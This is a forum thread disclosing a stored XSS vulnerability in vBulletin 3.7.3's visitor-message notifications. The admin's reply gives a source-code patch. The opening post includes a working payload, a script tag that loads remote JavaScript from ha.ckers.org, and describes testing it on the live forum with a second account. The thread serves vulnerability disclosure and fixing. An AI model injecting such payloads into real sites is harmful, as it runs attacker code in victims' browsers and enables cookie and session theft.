Go4Expert

Go4Expert (http://www.go4expert.com/)
-   Ethical hacking Tips (http://www.go4expert.com/articles/ethical-hacking-tutorials/)
-   -   vBulletin 3.7.3 PL1 XSS Vulnerability and Patch Fix (http://www.go4expert.com/articles/vbulletin-373-pl1-xss-vulnerability-t17905/)

SaswatPadhi 8Jun2009 13:49

vBulletin 3.7.3 PL1 XSS Vulnerability and Patch Fix
 

NOTICE



THIS XSS/XSRF VULNERABILITY WAS FOUND BY ME.

@ admin (shabbir)

Please don't ban me for this. Because I have not used this hack for any illegal / harmful purposes. (You can check all records). I have just tested an exploited and found it positive. Please fix it soon. I write this article so as to bring this thing to your eyes first, before anyone else knows about it and takes advantage.

Please do NOT reject this article and please approve it. Please don't remove this NOTICE section.


Action ;)



First, we must check the version of vBulletin used by G4EF :
(1) Open any page such as your user control panel.
(2) View the page-source.
(3) You discover this :
Code: css

<style type="text/css" id="vbulletin_css">
/**
* vBulletin 3.7.3 CSS
* Style: 'Default Style'; Style ID: 1
*/

@import url("clientscript/vbulletin_css/style-eb31dabe-00001.css");
</style>

(4) Perfect ! G4EF is not upgraded to latest 3.8.x vBulletin. So, we can hack it. :)

The vulnerability :
When vBulletin is used with "Visitor Messages" add-on, we can easily execute external code by XSS vulnerability that exists. When the XSS script is posted as visitor message, the data is run through htmlentities(); before being displayed to the general public/forum members. However, when posting a new message, a new notification is sent to the commentee (the one who receives). And when the commentee visits usercp.php (User Control Panel), under the domain he is hit with an unfiltered xss attach !

How I tested it :
(1) I opened a duplicate account : _H4X0R_, which I request shabbir to kindly delete now.
(2) I posted some test visitor messages. The most interesting (and working) one was <SCRIPT SRC=http://ha.ckers.org/xss.js>
(3) I logged out.
(4) I logged in as _H4X0R_.
(5) Opened my user control panel : usercp.php.
(6) Whoa !! XSS successful !


Conclusion



Please don't use this knowledge for illegal/harmful purposes. This was written only for educational purposes.

I think I deserve some good reputation points and/or some rewards for this !

Sorry shabbir, for using duplicate account but you may delete it now. You should also understand that this was important for the security of the forum and so please don't ban me :p

shabbir 9Jun2009 13:11

Re: vBulletin 3.7.3 PL1 XSS Vulnerability and Patch Fix
 
Thanks for reporting Saswat and Upgrading to 3.7.6 is the preferred solution which we would also be doing it but here is the quick fix. Using vBulletin 3.7.3 and having all the functionality and plugins tested I preferred not to upgrade immediately ( Though I have the upgrade option ) and here is the patch for this Vulnerability.

Open usercp.php file
Go to Line Number 250
Find the following Code
Code:

$visitormessage['summary'] = fetch_word_wrapped_string(fetch_censored_text(fetch_trimmed_title(strip_bbcode($visitormessage['pagetext'], true, true), 50)));
Replace with
Code:

$visitormessage['summary'] = htmlspecialchars_uni(fetch_word_wrapped_string(fetch_censored_text(fetch_trimmed_title(strip_bbcode($visitormessage['pagetext'], true, true), 50))));
And that should be fine for this problem.

vBulletin also recommendeds to upgrade to latest version which has all the fixes.

SaswatPadhi 9Jun2009 17:46

Re: vBulletin 3.7.3 PL1 XSS Vulnerability and Patch Fix
 
Glad to know that it's fixed. :)

indiansword 10Jun2009 07:05

Re: vBulletin 3.7.3 PL1 XSS Vulnerability and Patch Fix
 
ncie find. I really like XSS vulnerabilities. not 100% sure but i think its already reported to miliw0rm couple of months back.

SaswatPadhi 10Jun2009 07:14

Re: vBulletin 3.7.3 PL1 XSS Vulnerability and Patch Fix
 
What's miliw0rm ?

indiansword 10Jun2009 07:20

Re: vBulletin 3.7.3 PL1 XSS Vulnerability and Patch Fix
 
checkout miliw0rm.com , all the vulnerabilities which are found by different hackers and penetration testers are released under that program. Just search for "vbulletin" and you will see lots of them. This site plays a major role to help the developers of different CMSes to release a new version of their software after fixing the vulnerabilities.

SaswatPadhi 10Jun2009 07:47

Re: vBulletin 3.7.3 PL1 XSS Vulnerability and Patch Fix
 
Yeah, I got it. But it's not miliw0rm.com, it's milw0rm.com.
Lots of vulnerabilities and a md5 cracker too : perfect package for hackers.

indiansword 10Jun2009 07:50

Re: vBulletin 3.7.3 PL1 XSS Vulnerability and Patch Fix
 
yea sorry for that speling mistake.

shabbir 10Jun2009 08:55

Re: vBulletin 3.7.3 PL1 XSS Vulnerability and Patch Fix
 
Yes it was found on many other websites as well but no one had the Patch unless you upgrade the complete code and so here I provided the patch as well. Enjoy

harshit 10Jun2009 13:36

Re: vBulletin 3.7.3 PL1 XSS Vulnerability and Patch Fix
 
great piece of information

mayjune 15Jun2009 21:28

Re: vBulletin 3.7.3 PL1 XSS Vulnerability and Patch Fix
 
can you explain what is XSS ? i searched, i am still not getting it.....

shabbir 16Jun2009 09:26

Re: vBulletin 3.7.3 PL1 XSS Vulnerability and Patch Fix
 
Check out Css > Cross Site Scripting and Stealing Cookie With XSS

shabbir 2Jul2009 11:21

Re: vBulletin 3.7.3 PL1 XSS Vulnerability and Patch Fix
 
Nomination for article of the month - Jun 2009 Started. Nominate this article for Article of the month - Jun 2009

shabbir 15Jul2009 23:21

Re: vBulletin 3.7.3 PL1 XSS Vulnerability and Patch Fix
 
Start voting for this article for Article of the month - June 2009


All times are GMT +5.5. The time now is 09:59.